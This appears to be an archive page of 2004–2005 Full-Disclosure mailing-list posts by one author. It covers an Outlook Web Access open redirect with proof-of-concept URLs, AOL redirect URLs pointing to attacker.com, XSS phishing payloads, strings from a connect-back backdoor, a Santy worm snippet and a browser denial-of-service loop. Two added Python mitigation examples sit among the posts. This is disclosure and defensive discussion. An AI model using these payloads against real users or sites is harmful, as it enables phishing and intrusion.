Re: [Full-Disclosure] Multiple vulnerabilities in TrackerCam 5.12

2005-02-19 Thread morning_wood
the NDA was with a private vendor
what they do with my info is their business

 On Fri, 2005-02-18 at 14:57, morning_wood wrote:
  great job...
  this had been discovered by myself over a year ago,
  but was only released as an internal to a project
  i was under an NDA when i discovered it
 
 And they did nothing about it for a full year?
 
 -- 
 404 [EMAIL PROTECTED]
 Textbox Networks
 
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


Re: [Full-Disclosure] Multiple vulnerabilities in TrackerCam 5.12

2005-02-18 Thread morning_wood
great job...
this had been discovered by myself over a year ago,
but was only released as an internal to a project
i was under an NDA when i discovered it

cheers,
Donnie


Re: [Full-Disclosure] google getting attacks; anybody got this? --i got it.

2005-02-11 Thread morning_wood
From: Gaurav Kumar [EMAIL PROTECTED]
To: full-disclosure@lists.netsys.com
Sent: Friday, February 11, 2005 1:50 AM
Subject: [Full-Disclosure] google getting attacks;anybody got this? --i got
it.


 google is detecting if search contains
 inurl:member.php?action=viewpromember= -- myphp forum attack.



kiddies are as kiddies do
grow up and stop using canned exploits and google searching
btw... hope you rot like E2-Labs you backstabbing motherf*uckers

cheers,
m.w


Re: [Full-Disclosure] google getting attacks; anybody got this? --i got it.

2005-02-11 Thread morning_wood
yes... too bad he cant read...

m.w
- Original Message - 
From: Polarizer [EMAIL PROTECTED]
To: full-disclosure@lists.netsys.com
Sent: Friday, February 11, 2005 3:05 AM
Subject: Re: [Full-Disclosure] google getting attacks; anybody got
this? --i got it.


 This is nothing new. Was mentioned here already 06/01/2005. Read on here

 http://lists.netsys.com/pipermail/full-disclosure/2005-January/030610.html

 The Polarizer

 polarizers at its best
 http://www.codixx.de/polarizer.html



[Full-Disclosure] netdde during update

2005-02-08 Thread morning_wood
while netdde is not started by default.
I did just notice netdde does run during
Windows update...

this would allow a window of opportunity
to exploit the service. a worm using the
netdde exploit could take advantage of
this before the user fully updates.

just noticing,

Donnie Werner


[Full-Disclosure] re: Microsoft Outlook Web Access URL Injection

2005-02-07 Thread morning_wood
looks like MS is NOT publicly releasing a fix for this, while they have the
means and solution at hand.
( at least under IE )
a kind reader sent this little snippet...

... was able to get Microsoft to provide us with a DLL
to drop under IIS 6 to compare URL variable against the Host: header
variable and do 302 to web root if they are not similar.  This fixed the
problem, however, I doubt that Microsoft will make this patch available to
the public.

what happened to MS commitment to security???


ugg,

m.w


[Full-Disclosure] Microsoft Outlook Web Access URL Injection Vulnerability

2005-02-06 Thread morning_wood

 - EXPL-A-2005-001 exploitlabs.com Advisory 030 -

- Microsoft Outlook Web Access -



OVERVIEW

A vulnerability in Microsoft Outlook Web Access allows malicious
attackers to redirect the login to any URL they wish.
This allows the attacker to force the user to the site of the
attacker's choosing, enabling the attacker to use social engineering
and phishing style of attacks.


AFFECTED PRODUCTS
=
Microsoft Outlook Web Access ( OWA )
Windows 2003


DETAILS
===
By using a specially crafted URL an attacker can cause the end user
to be redirected to an arbitrary URL.


ATTACK PROFILE
==
An attacker could gather known user email addresses for a company
that uses OWA. By appending an obfuscated redirected url with an
encoded url such as

https://[owa-host]/exchweb/bin/auth/owalogon.asp?url=http://3221234342/

this will take the user to http://example.com when the login box
is pressed, and a user is more likely to trust the url.
This would be used to send a link to the trusted login.
The attacker can then have a page to capture the user / password
and redirect back to the original login page or some other form of
phishing attack ( or other trusted URL attacks )


SOLUTION

Microsoft was contacted on Jan 20, 2005
NO patch has been produced to correct the vulnerability.
They have issued the following: on Jan 21, 2005
( see VENDOR RESPONSE )
This release is dated Jan 25, 2007


PROOF OF CONCEPT


1.https://[owa-host]/exchweb/bin/auth/owalogon.asp?url=http://[otherhost]

2.
https://[owa-host]/exchweb/bin/auth/owalogon.asp?url=http://[otherhost/file.exe]

click login


after injection into the form, the source reveals...

<BODY scroll=AUTO bgColor=#3D5FA3 text=#00 leftMargin=0 topMargin=0>
<FORM action=/exchweb/bin/auth/owaauth.dll method=POST name=logonForm autocomplete=off>
<INPUT type=hidden name=destination value="http://[otherhost/file.exe]">
<INPUT type=hidden name=flags value=0>
<TABLE id=borderTable class=standardTable cellSpacing=0 cellPadding=0 height=100% width=100% bgColor=#3D5FA3 border=0>

note:
the [otherhost] may easily be obfuscated so as to not alarm the targeted
user(s) such as
 https://[owa-host]/exchweb/bin/auth/owalogon.asp?url=http://3221234342/
( http://example.com )


notes:
example 1 redirects the user to a url of the attackers choosing.
example 2 prompts the user to download an executable or other file.
 this could be used in conjunction with the aforementioned attack scenario.


CREDITS
===
This vulnerability was discovered and researched by
Donnie Werner of exploitlabs.com

Donnie Werner
[EMAIL PROTECTED]
[EMAIL PROTECTED]
-- 
Web: http://exploitlabs.com
 http://zone-h.org



VENDOR RESPONSE
===

researcher initial:
--
Dear Microsoft,
 The following discusses a potential security vulnerability affecting
one of your products. We are bringing it to your attention in order to
assist you in investigating it and determining the appropriate actions,
and have provided preliminary information about the potential
vulnerability below. Please read our disclosure policy, available at
http://www.exploitlabs.com/disclosure-policy.html if you have any
questions.
Please confirm using the contact information I have provided below that
you have received this note.

We look forward to working with you,

Exploitlabs Research Team

Donnie Werner
[EMAIL PROTECTED]


vendor response 1
-
Hello Donnie,

Thanks very much for contacting us. We have investigated reports of this
behavior in the past and plan to fix it in the next major release of
Exchange. Please let me know if you have further questions.

Thanks,
Christopher, CISSP


researcher initial 2

Christopher,
when is the next major release of Exchange due?
I think it may be in the interest of admins to know this
flaw exists, and to possibly alert their users of potential
phishing attacks and to help secure their systems.
Exchange 2003 OWA is used extensively in corporate
environments, where this flaw will have the most impact
being this is a moderate remote threat, this researcher
feels that PUBLIC FULL DISCLOSURE is needed.
possibly MS would be willing to issue a statement to
the public regarding this issue at this time.

regards,

Donnie Werner ( no fancy letters )

vendor response 2
-
(none)
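The mitigation this thread describes (the earlier "re: Microsoft Outlook Web Access URL Injection" post: compare the url parameter against the Host: header and 302 to the web root when they do not match) written out as an added example in Python. It is not Microsoft's DLL and not exploitlabs.com code; the names safe_redirect_target and WEB_ROOT and the host owa.example.com are assumptions. It goes slightly beyond the advisory: besides the decimal-IP form http://3221234342/ it also rejects percent-encoded host names (the form the AOL redirect advisory further down this page relies on), scheme-relative targets and userinfo tricks.

```python
"""Validate an OWA-style ?url= redirect parameter against the request Host header.

Added example, not Microsoft's DLL and not exploitlabs.com code. It implements
the check the thread describes: if the url parameter does not point back at the
host that served the login page, send the client to the web root instead.
"""
from urllib.parse import unquote, urlsplit, urlunsplit

WEB_ROOT = "/"  # assumed fallback target, as in the DLL fix described on the list


def _decode_fully(value: str, rounds: int = 3) -> str:
    """Undo repeated percent-encoding so %77%77%77 (or %2577...) is inspected as text."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def safe_redirect_target(url_param: str, request_host: str) -> str:
    """Return a redirect target that stays on request_host, else WEB_ROOT.

    request_host is the raw Host: header value, e.g. "owa.example.com:443"
    (assumed host name; a port suffix is ignored).
    """
    if not url_param:
        return WEB_ROOT
    expected_host = request_host.lower().split(":")[0]
    candidate = _decode_fully(url_param).strip()
    # Browsers treat backslashes as slashes, so "/\evil" must be seen as "//evil".
    candidate = candidate.replace("\\", "/")
    try:
        parts = urlsplit(candidate)
    except ValueError:  # e.g. malformed IPv6 brackets
        return WEB_ROOT

    if parts.scheme or parts.netloc:
        # Absolute or scheme-relative URL: only http(s) back to our own host passes.
        # Decimal IPs (http://3221234342/), foreign hosts, "//evil" and
        # "http://owa.example.com@evil" (whose hostname is evil) all fall to WEB_ROOT.
        if parts.scheme.lower() not in ("http", "https"):
            return WEB_ROOT
        if parts.hostname != expected_host:
            return WEB_ROOT
        path = parts.path or "/"
    else:
        # Relative URL: must be rooted at "/" and must not start with "//".
        path = parts.path
        if not path.startswith("/") or path.startswith("//"):
            return WEB_ROOT

    # Emit a host-less URL, so the Location header can never point off-site.
    return urlunsplit(("", "", path, parts.query, ""))


if __name__ == "__main__":
    host = "owa.example.com"
    for raw in ("/exchange/inbox?x=1", "http://3221234342/",
                "http://%77%77%77%2e%74%69%67%65%72%74%65%61%6d%2e%73%65",
                "//evil.example/", "https://OWA.example.com/exchange/"):
        print(f"{raw!r:60} -> {safe_redirect_target(raw, host)}")
```

One caveat for anyone deploying a check like this: the Host: header is itself supplied by the client, so in practice expected_host should come from the server's configured canonical name rather than from the request.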


Re: [Full-Disclosure] Is there a 0day vuln in this phisher's site?

2005-01-30 Thread morning_wood
if you mean http://www.exploitlabs.com/urlbar.html ...
then I sent MS an advisory of this... they are working on a patch.
funny... i just noticed my first PoC of this is dated 08/27/04

( http://www.kb.cert.org/vuls/id/490708 ) is dated 2001 !!!


MS response #1
Thank you for sending this report.  We're currently investigating this
issue, however it looks to be a duplicate of other UI spoofing issues
that have been posted.  For reference please see the below:

http://freehost07.websamba.com/greyhats/dlwinspoof-menu.htm

We've worked to address this update in XPSP2 by default in the Internet
Zone, and the option exists to enable this mitigation for other zones
via the registry or group policy.  Please let me know if you issue is a
separate vulnerability from the one listed above.

MS response #2
Donnie,

Thank you for the explanation.  I've been doing more research, and it seems
that while the proof-of-concept you've provided is different than the one
from Greyhats I sent earlier, it still seems that this is a known issue
originally discovered by Georgi Guninski and Andrew Clover.  I've found a
US-CERT Alert on the malicious use of chromeless windows to spoof UI linked
below and a CVE entry.  I think this is the same issue, if its not please
let me know the difference and I apologize for the confusion.

We are tracking this issue and working to resolve it.  So far the first
public fix for this is in XPSP2.  You may also look at the Windows Server
2003 SP1 Release Candidate as that should include the mitigations for this
issue as well.

http://www.kb.cert.org/vuls/id/490708
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-1410


soo...


So have I. Not to diminish the importance of the attack, but this
assumes the default placement of Address Bar if I'm not mistaken, so if
the user changes their toolbar layout the popup will give itself away,
correct?

possibly yes... tested
1. win2k ie6 default bar position  - YES
2. winXPsp1 ie6 non default bar position - locked - YES
3. winXPsp2 ie6 default bar position - NO

my example provided is different in effect than the MS provided
PoC link, but they use the same type of coding


cheers,

Donnie Werner









Re: [Full-Disclosure] NAT router inbound network traffic subversion

2005-01-28 Thread morning_wood
scenario...

NAT client browses web...
NAT client initiates a HTTP request to do this...
ROUTER returns the request to NAT client...
( normal activity )

attacker website exploits client browser...
exploit drops and executes badfile.exe
badfile.exe hooks iexplore.exe...

badfile.exe is 'reverse connecting trojan'...
badfile.exe initiates a HTTP  request to do this...
attacker's badfile.exe' 'client' is waiting with a HTTP server...

the new hooked browser initiates a HTTP request to the attacker.
NAT client is now connected to the attacker
through the ROUTER ( kinda like browsing the web huh? )
attacker now has unrestricted packet via the NAT client,
that is where ??? BEHIND YOUR ROUTER

attacker now can do as he wishes to the rest of your network
( GAME OVER )


Cheers,
m.w


Re: [Full-Disclosure] Re: [ GLSA 200501-36 ] AWStats: Remote code execution

2005-01-27 Thread morning_wood
 I don't have the time to investigate the cgi and dc binaries.
 The cgi at least tries to daemonize and opens a TCP listening socket.
 They also try to replace the index page on the vulnerable site.

cgi
1495   1495  0   /dev/tty
149E   149E  0   socket
14AA   14AA  0   listen
14C0   14C0  0   PsychoPhobia Backdoor is starting...

254E   254E  0   init.c


dc
09C0   09C0  0   Welcome to Data Cha0s Connect Back Shell
09E9   09E9  0   No More Damn Issue Commands
0A20   0A20  0   Data Cha0s Connect Back Backdoor
0A42   0A42  0   /bin/sh
0A4D   0A4D  0   XTERM=xterm
0A59   0A59  0   HISTFILE=
0A63   0A63  0   SAVEHIST=
0A6D   0A6D  0   Usage: %s [Host] port
0A86   0A86  0   [*] Dumping Arguments
0A9C   0A9C  0   [*] Resolving Host Name
0AB4   0AB4  0   [*] Connecting...
0AC6   0AC6  0   [*] Spawning Shell
0AD9   0AD9  0   [*] Detached

4321   4321  0   dc-connectback.c


cheers,
m.w



Re: [Full-Disclosure] New Santy-Worm attacks *all* PHP-skripts

2005-01-06 Thread morning_wood
 The relevant code:
 -
 $procura = 'inurl:*.php?*=' . $numr;

 for($n=0;$n<900;$n += 10){
 $sock = IO::Socket::INET->new(PeerAddr => "www.google.com.br", PeerPort =>
 80, Proto => "tcp") or next;
 print $sock "GET /search?q=$procura&start=$n HTTP/1.0\n\n";
nothing new here...
unless... we try the L337 G00GLE HAX0R S34RCH STR!NGZ
http://www.google.com/search?q=inurl:*.php%3F*%3D&hl=en&lr=&newwindow=1&start=90&sa=N

BUT !!!  LIES !!! LIES I SAY 
GOOGLE IS TELLING ME I AM INFECTED ( lmfao )

--- / SNIP /--
and it appears that your computer or network has been infected
---/ SNIP /--

WRONG ANSWER WRONG EXPLANATION WRONG JUST WRONG

We're sorry...
.. but we can't process your request right now. A computer virus or spyware
application is sending us automated requests, and it appears that your
computer or network has been infected.
We'll restore your access as quickly as possible, so try again soon. In the
meantime, you might want to run a virus checker or spyware remover to make
sure that your computer is free of viruses and other spurious software.
We apologize for the inconvenience, and hope we'll see you again on Google.




bleh,  now i need to find a new best friend... GOOGLE LIED :(
m.w


Re: [Full-Disclosure] Windows (XP SP2) Remote code execution with parameters

2005-01-06 Thread morning_wood
 hhctrl.ocx is not installed by default in all SP1s but is on all SP2.
 Therefore when the exploit page tries to create the object he cannot
 find it so it tries to install it. On SP2 it exists by default therefore
 created silently.

i replied to this because of this statement by the O.P..

Any system running any Microsoft Windows XP edition with Internet Explorer
6
or higher, even with SP2 applied.
this suggests that all XP are affected by default, including sp2.

cheers,

m.w

p.s. I have noticed that the final pre-release of SP2 is much better ( in my
experience )
performance and security wise. ( and it retains raw sockets ). In SP2rc2,
IE6 popup
blocker stopped the PoC at default settings.


Re: [Full-Disclosure] AOL website redirection scripts allow for abuse

2005-01-06 Thread morning_wood
i think there are many like this
http://g.msn.com/0AD00014/?http://google.com
http://g.msn.com/0AD00014/?http://example.com
etc etc etc
your examples actually use an on-site URL redir
and i recall some from yahoo as well used extensively for spam
im quite sure they ( AOL ) know about this, and it is a purpose
built feature.

my 2 bits,

m.w

- Original Message - 
From: Michel Blomgren [EMAIL PROTECTED]
To: bugtraq@securityfocus.com; full-disclosure@lists.netsys.com
Sent: Sunday, December 26, 2004 9:43 AM
Subject: [Full-Disclosure] AOL website redirection scripts allow for abuse



   tigerteam.se security advisory - TSEAD-200412-1
   www.tigerteam.se

  Advisory: Hole in AOL's redirection scripts allow for abuse.
  Date: Sat Dec 18 02:29:52 EST 2004
   Application: AOL's redir, redir.adp, clickThruRedirect.adp, and
frame.adp scripts.
 Vulnerability: Lack of input filtering allows for redirection abuse.
 Reference: TSEAD-200412-1
Author: Xavier de Leon [EMAIL PROTECTED]


 SYNOPSIS

 http://www.corp.aol.com/whoweare/mission.shtml


 VULNERABILITY

 The scripts in question allow input from external resources without
 validation  or filtering of any sort. Thus allowing spammers, phishers,
and
 other potential attackers a greater deceptive advantage.

 On another note, it is widely known that AOL utilizes a rating system
 (throttling)  on Instant Messages and e-mails  based on content;
specifically
 spam. However, with  the domain prefix aol.com|.* in the mix, rating
doesn't
 seem to be quite effective. And that enables spammers and phishers access
to
 spread their content around while bypassing certain throttling rates.


 COMMENT

 In an environment where AOL users are being phished constantly via Instant
 Messenger or e-mail, people are being outwitted into giving up sensitive
 credentials by clicking on arbitrary links. This is where the stated
 vulnerability steps in.

 Although the redirection attacker host can be seen from the url itself, it
can
 be easily hex'd. Example:


http://dynamic.aol.com/cgi/redir?http://%77%77%77%2e%74%69%67%65%72%74%65%61%6d%2e%73%65
 (redirects to www.tigerteam.se)

 [ or http://dynamic.aol.com/cgi/redir?http://tigerteam.se ]

 From the example above, one must note that the "http://" protocol text
must be
 included or else the script redirects to ./ (in this case being /cgi/)

 Once redirected, the attacker host will be seen on the address bar.


 DISCOVERY

 Xavier de Leon [EMAIL PROTECTED]

 While looking randomly through the AOL pages, I spotted a call to the
'redir'
 script.  I entered a bogus url and it redirected without any error
messages
 whatsoever.

 I searched several search engines (google/vivisimo/yahoo) for pages within
AOL
 which made calls to scripts with 'edir' in their name, and ran into the
 clickThruRedirect.adp and redir.adp scripts. It turns out they both
had
 the same problem. Upon such results, I began further research into the
 situation.


 EXPLOITATION

 http://dynamic.aol.com/cgi/redir?http://www.attacker.com

http://aolsvc.aol.com/ams/clickThruRedirect.adp?0,0x0,http://www.attacker.com

http://content.alerts.aol.com/ams/clickThruRedirect.adp?0,0x0,http://www.attacker.com
 http://www.aol.com/ams/clickThruRedirect.adp?0,0x0,http://www.attacker.com

http://sinbad.aol.fr/ams/clickThruRedirect.adp?0,0x0,http://www.attacker.com

http://www.shopping.aol.fr/ams/clickThruRedirect.adp?0,0x0,http://www.attacker.com

http://ht-brands.aol.com/ams/clickThruRedirect.adp?0,0x0,http://www.attacker.com

http://aolreseau.aol.fr/ams/clickThruRedirect.adp?0,0x0,http://www.attacker.com

http://phileas.aol.fr/ams/clickThruRedirect.adp?0,0x0,http://www.attacker.com

http://publish.groups.aol.com/ams/clickThruRedirect.adp?0,0x0,http://www.attacker.com

http://shop.aol.com/ams/clickThruRedirect.adp?0,0x0,http://www.attacker.com

http://www.aolatschool.com/ams/clickThruRedirect.adp?0,0x0,http://www.attacker.com

http://webcenter.shop.aol.com/ams/clickThruRedirect.adp?0,0,http://www.attacker.com

http://findajob.aol.com/ams/clickThruRedirect.adp?0,0x0,http://attacker.com
 http://expressions.aol.com/redir.adp?_dci_url=http://www.attacker.com
 http://www.aol.ca/ams/clickThruRedirect.adp?0,0x0,http://attacker.com

http://entertainment.channels.aol.ca/redir.adp?_dci_url=http://www.attacker.com
 http://redirect.aol.ca/cgi/redir-complex?sid=0url=http://www.attacker.com
 http://news.channels.aol.ca/redir.adp?_dci_url=http://www.attacker.com
 http://travel.channels.aol.ca/redir.adp?_dci_url=http://www.attacker.com

http://www.defidumarche.aol.ca/ams/clickThruRedirect.adp?0,0x0,http://www.attacker.com

http://shop.aolcanada.aol.ca/ams/clickThruRedirect.adp?0,0x0,http://www.attacker.com
 http://finance.channels.aol.ca/redir.adp?_dci_url=http://www.attacker.com
 http://women.channels.aol.ca/redir.adp?_dci_url=http://www.attacker.com


Re: [Full-Disclosure] IE sp2 and Mozilla Firefox DoS.

2004-12-28 Thread morning_wood
even Microsoft publishes PoC for browser DoS ( multi platform too )
see:
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dninstj/html/privacyforbrowserusers.asp

-- / snip / --
var big_string = "double me up!";
while (true)
{
big_string = big_string + big_string;   // 20 iterations equals all your memory...
}
- / snip / 

kinda funny... unpatched too!
cheers,
m.w


Re: [Full-Disclosure] Cross-Site Scripting - an industry-wide problem

2004-12-24 Thread morning_wood
quite common, funny because xss can be used in PHISHING attacks.
instead of alert blah try some html redirects to a hosted site with a fake
login
spoofing the original content ( a login page ) and capture username/password
then pass them to the real login page.
or better yet... xss dos attacks, like.
[script]
alert("oh no")
;window.close()
[/script]

but i guess xss is just kiddi play... or is it?

m.w


 Cross-Site Scripting - an industry-wide problem
 ===

 In early december i started a series of tests to find Cross-Site Scripting
 (XSS) vulnerabilities. It quickly turned out that the majority of all
major
 websites suffer some kind of XSS. This is a disclosure of 175
 vulnerabilities at once. Enjoy the ride...

 Test scenario
 =

 A site was considered affected if it is possible to inject a javascript
into
 the output page by making a browser GET or POST request to the webserver.
As
 a proof-of-concept the script alert(document.cookie) got used.

 All tests were made on a fully patched WinXP SP2 machine and Internet
 Explorer 6. Most of the proof-of-concept links in this report will not
work
 using another browser, mainly because in many cases i used javascript in
 styles which isn't supported by browsers like Firefox and because Firefox
 automatically applies character encoding to a URL. I was just too lazy to
test
 each issue cross-browser, so this doesn't mean automatically that Internet
 Explorer is more vulnerable to XSS.

 Impact
 ==

 In many cases XSS is reduced to the attack of stealing session cookies,
but
 XSS can be used to do a lot more things. Using DOM manipulation you can
 change the target of a login form or fake one, change download links or
 simply insert your own content into a website. As part of mass-mailings
this
 can be used for login data phishing, spreading of malware or distribution
of
 false news that seem to come from a trustworthy source (which is an
 interesting option for daytraders on penny stocks for example).

 Don't forget that the injected script is running in the security context
of
 the affected site. If you know who you are attacking and that the victim
has
 the affected site in a special trusted zone it can be possible to execute
 not safe for scripting ActiveX controls - giving you more or less total
 control. In intranets and for extranet web applications this is a not so
 uncommon configuration.

 For sure XSS is nothing compared to a remote buffer overflow. But only
 because this worst case scenario is happening quite often these days, it
 does not mean XSS is not a security issue. XSS flaws are easy to find and
 spammers are always searching for new stuff.

 Finally for some sites on the list dedicated to security a XSS flaw is
just
 an embarrassing thing ;)

 Affected sites
 ==

 This list is reduced to the second-level domain for readability and
posting
 size. This isn't always fair since sometimes a sub-domain is independent
 from the SLD. Please download the complete list of proof-of-concept links
 from http://www.mikx.de/xss.php.

 All webmasters were informed by an email and/or their website feedback
forms
 during december, to give them a fair chance to react. Some of them replied
 really quick and patched the issue in a few hours, others (sadly a lot)
 never replied. If you are responsible for one of the affected sites and
you
 have not been informed or are not able to reproduce the issue, please
don't
 hesitate to contact me.

 The sites in the tests were picked at random from international and german
 major websites and/or sites related to security/computers. I just tested
 what came to my head - so there is no hidden message:

 about.com, activestate.com, adobe.com, altavista.com, amazon.com, amd.com,
 annoyances.org, aol.com, apache.org, apple.com , archive.org, arcor.de,
 ask.com, ati.com, bahn.de, bitdefender.de, blizzard.com, blogdex.net,
 blogger.com, bloogz.com, ca.com, ccc.de, cdu.de, chip.de, ciao.de,
cert.org,
 chillingeffects.org, cnn.com, comdirect.de, consors.de, csialliance.org,
 csu.de, dell.com, daypop.com, divx.com, dooyoo.de, doubleclick.com,
 download.com, easycredit.de, ebay.com, etrade.com, evite.com, excite.com,
 fedex.com, fimatex.de, flexwiki.com, fool.com, free-av.de, freshmeat.net,
 fsf.org, fujitsu.com, gamestar.de, gm.com, gmx.net, gnu.org, go.com,
 golem.de, google.com, groupee.com, gruene-partei.de, guenstiger.de,
 heise.de, hosting.com, hp.com, ibm.com, icq.com, idealo.de,
imagemagick.org,
 infineon.com, informationsecurityireland.com, infospace.com, intel.com,
 itaa.org, izb.de, jamba.de , juno.com, kde.org, kelkoo.de, kerio.com,
 liberale.de, linspire.com, looksmart.com, lufthansa.com, lycos.com,
 macromedia.com, mandrakesoft.com, mayflower.de, mcafee.com, meetup.com,
 messagelabs.com, metacrawler.com, metadot.com, microsoft.com, mlb.com,
 mnogosearch.org, modblog.com, modssl.org, mozilla.org, mozillazine.org,
 msdn.com, msn.com, msnbc.com, nasa.gov, 
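The test criterion the quoted advisory uses (a GET parameter that ends up in the output page as live script), shown as an added example in Python; this is not code from the mikx.de tests. A constructed search page reflects its q parameter, once verbatim and once with context-aware output encoding, and the standard-library HTML parser is used to check what a browser would actually treat as a tag or event-handler attribute. The host search.example and the helper names are assumptions.

```python
"""Reflected GET parameter: the unsafe rendering beside the escaped one.

Added example, not code from the mikx.de tests. A constructed search page
copies the q parameter into the response; the unsafe version reproduces the
class of bug the advisory counts, the escaped version shows context-aware
output encoding. html.parser is used only to verify what a browser would
actually see as a tag or attribute.
"""
import html
from html.parser import HTMLParser
from typing import List
from urllib.parse import parse_qs, urlsplit

# Constructed payloads: the advisory's alert(document.cookie) probe, plus an
# attribute-context variant that needs no "<" at all.
SCRIPT_PAYLOAD = "<script>alert(document.cookie)</script>"
ATTR_PAYLOAD = "x onmouseover=alert(document.cookie)"
POC_URL = "http://search.example/results?q=" + SCRIPT_PAYLOAD  # assumed host


def query_param(url: str, name: str) -> str:
    """Return the first value of a query parameter ("" if absent)."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True).get(name, [""])[0]


def render_vulnerable(q: str) -> str:
    """Parameter lands in body text and in an unquoted attribute untouched."""
    return f"<h1>Results for {q}</h1>\n<input name=q value={q}>"


def render_escaped(q: str) -> str:
    """Body text gets &lt; &gt; &amp;; attribute values are quoted and get &quot; too."""
    return (f"<h1>Results for {html.escape(q, quote=False)}</h1>\n"
            f'<input name="q" value="{html.escape(q, quote=True)}">')


class _ScriptSniffer(HTMLParser):
    """Collects script tags and on* event-handler attributes the parser sees."""

    def __init__(self) -> None:
        super().__init__()
        self.hits: List[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.hits.append("<script>")
        self.hits.extend(name for name, _ in attrs if name.startswith("on"))


def injected_script(page: str) -> List[str]:
    """What would execute: real <script> tags and on* attributes, not text that merely looks like them."""
    sniffer = _ScriptSniffer()
    sniffer.feed(page)
    sniffer.close()
    return sniffer.hits


if __name__ == "__main__":
    q = query_param(POC_URL, "q")
    for label, render in (("vulnerable", render_vulnerable), ("escaped", render_escaped)):
        for payload in (q, ATTR_PAYLOAD):
            print(f"{label:10} {payload!r:45} -> {injected_script(render(payload))}")
```

The attribute payload is the reason escaping "<" alone is not enough: in an unquoted attribute a space already ends the value, so the fix is to quote every attribute value and escape quotes inside it, as render_escaped does.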

Re: [Full-Disclosure] Re: Possible apache2/php 4.3.9 worm

2004-12-22 Thread morning_wood
 Below are some examples of what an actual Santy search request would
 look like:


http://www.google.com/search?num=100&hl=en&lr=&as_qdr=all&q=allinurl%3A+%22viewtopic.php%22+%22topic%3D27516%22&btnG=Search

http://www.google.com/search?num=100&hl=en&lr=&as_qdr=all&q=allinurl%3A+%22viewtopic.php%22+%22t%3D2580%22&btnG=Search

http://www.google.com/search?num=100&hl=en&lr=&as_qdr=all&q=allinurl%3A+%22viewtopic.php%22+%22p%3D6653%22&btnG=Search

 If Google were to block this particular pattern of search request it
 would stop the spread of the worm for now.

looks like they did...
 / snip / 

Google Error

We're sorry...
.. but we can't process your request right now. A computer virus or spyware
application is sending us automated requests, and it appears that your
computer or network has been infected.
We'll restore your access as quickly as possible, so try again soon. In the
meantime, you might want to run a virus checker or spyware remover to make
sure that your computer is free of viruses and other spurious software.
We apologize for the inconvenience, and hope we'll see you again on Google.

 / snip / --

cheers,

m.w


Re: [Full-Disclosure] This sums up Yahoo!s security policy to a -T-

2004-12-22 Thread morning_wood
 If their refusal to release that mail even after their customer is dead is
 an indication as to their privacy practices, three cheers for Yahoo.

 Don't you get the whole slippery slope thing?  If it's ok when you're
 dead (which it's not, my stuff is my stuff...destroy it when you're sure
 I've really shuffled off elsewhere, unless I gave you very specific
 instructions otherwise) then maybe it's ok if you are in a coma...then
 maybe it's ok if you are really sick and someone else is your legal
 guardian because you've been declared non-compos mentis...then maybe it's
 ok if it's your parents...or your wife...or a concerned neighbor...

 What's in that mailbox is/was mine, none of your business unless I chose
 to share it.

i couldnt agree more... another case of lame, illogical media bullshit
BRAVO YAHOO

happy holidays,

m.w


Re: [Full-Disclosure] Official IFRAME patch - make sure it installs correctly

2004-12-02 Thread morning_wood
I can confirm on WinXP SP1 ( download the [patch].exe run and reboot)
 Mr Wever's exploit PoC did not run ( no shell, dialog warning )

cheers,
m.w

  The IFRAME vulnerability has been patched, see
http://www.microsoft.com/technet/security/bulletin/ms04-040.mspx

 The wording in ms04-040 is so vague, I am not entirely sure that this
 patch is a fix for the IFRAME bug(s)?

  *** Make sure you are patched after installing ***
  I installed it using Automatic Updates (on Win2ksp4), rebooted and
loaded my InternetExploiter.html: IT STILL WORKED!!
  Even though both Automatic Updates and
"http://windowsupdate.microsoft.com" reported that I was patched!?!
  I manually downloaded the exe and ran it, rebooted and now I'm finally
truly patched.

 Just so I am clear, after automatic updates applied the critical
 patch on W2KSP4 and rebooted, the IFRAME exploit still worked, but
 manually downloading the executable given in the Microsoft alert and
 running it results in a system on which the IFRAME exploit no longer
 works?

 This would be confirmation that ms04-040 actually does address the
 IFRAME exploit.


 Kevin





Re: [Full-Disclosure] Network Sniffing

2004-11-30 Thread morning_wood
http://sourceforge.net/projects/showtraf

showtraf.
i use this everyday, its free, easy, simple, and small ( 1 file ).



Re: [Full-Disclosure] overburning edit of molded cdroms feasible?

2004-11-29 Thread morning_wood
.. molded cdroms..
( i assume you mean pressed cdroms like MsWindows or Doom3 that you buy)
 do you even know how they are made?!?
.. you cant burn more data on a molded cdrom, as the
reflective layer is not only not burnable, but never was burnt to begin
with.
but thanks for playing!!!

maybe a better idea is hard drives and usb thumbdrives,
how about some floppies!!! or maybe cover the anti-record
tabs on some audio cassettes, record over some Britney with
some Megadeath or.. nevermind.
*sigh*

m.w

p.s. next time please do some research...
http://www.google.com/search?hl=enq=how+pressed+cdroms+are+made
http://www.burnworld.com/cdr/primer/

- Original Message - 
From: Saber Taylor [EMAIL PROTECTED]
Subject: [Full-Disclosure] overburning edit of molded cdroms feasible?


 Scenario: chinese agent buys molded cdroms from stores
 in Washington D.C. and overburns new data along the
 same spiral with a specialized cdrom drive. Returns
 the cdroms to the store which then re-shrinkwraps and
 puts back on the shelf. 1.) Is this possible? 2.)
 Could firmware automatically do a quick check for
 this?

 Thanks.

 [EMAIL PROTECTED]

  __
 Do you Yahoo!?
^^ no, and stop asking me



Re: [Full-Disclosure] Network Security in India

2004-11-24 Thread morning_wood
then there was this little diddy...

HYDERABAD: The hacker is on the prowl and the government can do little to
stop him in his tracks. At least, that's what the IT department - custodian
of the government web sites and servers ...

http://timesofindia.indiatimes.com/articleshow/320561.cms

cheers,
D.W





Re: [Full-Disclosure] For your pleasure

2004-11-17 Thread morning_wood
oh?
-
08/23/2001  05:00 AM   354,468 wmpaud1.wav
( bintext output )
00056862   00056862  0   INFOICRD
0005686E   0005686E  0   2000-04-06
00056882   00056882  0   Deepz0ne
00056894   00056894  0   Sound Forge 4.5
-
..heh

 Guys,

 For your pleasure:
 http://www.materiel.be/n/7685/Des-fichiers-pirates-dans-XP.php

 I know, it is in French, but here is my translation, it deserves to be
 known.

 Digging into Windows XP Operating Systems, the journalists of PC Welt
 discovered the following text at the end of the files present in the
 C:/Windows/Help/Tours/WindowsMediaPlayer/Audio/Wav directory:

 [see the picture at the link]

 You have to know that DeepzOne is the nickname of a founding member of the
 Radium cracking group created in 1997 and specialized in the cracking of
 sound oriented software.

